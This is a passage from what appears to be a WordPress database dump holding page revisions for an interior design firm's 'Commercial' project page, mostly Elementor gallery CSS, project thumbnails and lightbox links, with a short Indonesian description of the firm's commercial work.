tion-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-09-22 08:38:28','2023-09-22 08:38:28','',4681,'https://bauhaus.futuremediatrix.com/?p=4859',0,'revision','',0),(4860,3,'2023-09-22 08:38:28','2023-09-22 08:38:28','<h3>our recent work</h3>\n														<h2>\n								Bahaus Commercial Projects							</h2>\n							<p> Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.\nKami senantiasa berkomitmen dalam mewujudkan desain interior yang menjawab 3 tantangan ini. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMS5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMi5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/commercial-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-fe2cde6\" data-elementor-lightbox-title=\"commercial-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgyNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL2NvbW1lcmNpYWwtMy5qcGciLCJzbGlkZXNob3ciOiJhbGwtZmUyY2RlNiJ9\">\n														</a>','Commercial','','inherit','closed','closed','','4681-revision-v1','','','2023-09-22 08:38:28','2023-09-22 08:38:28','',4681,'https://bauhaus.futuremediatrix.com/?p=4860',0,'revision','',0),(4861,3,'2023-09-22 08:39:17','2023-09-22 08:39:17','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/Office-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"Office-1\" 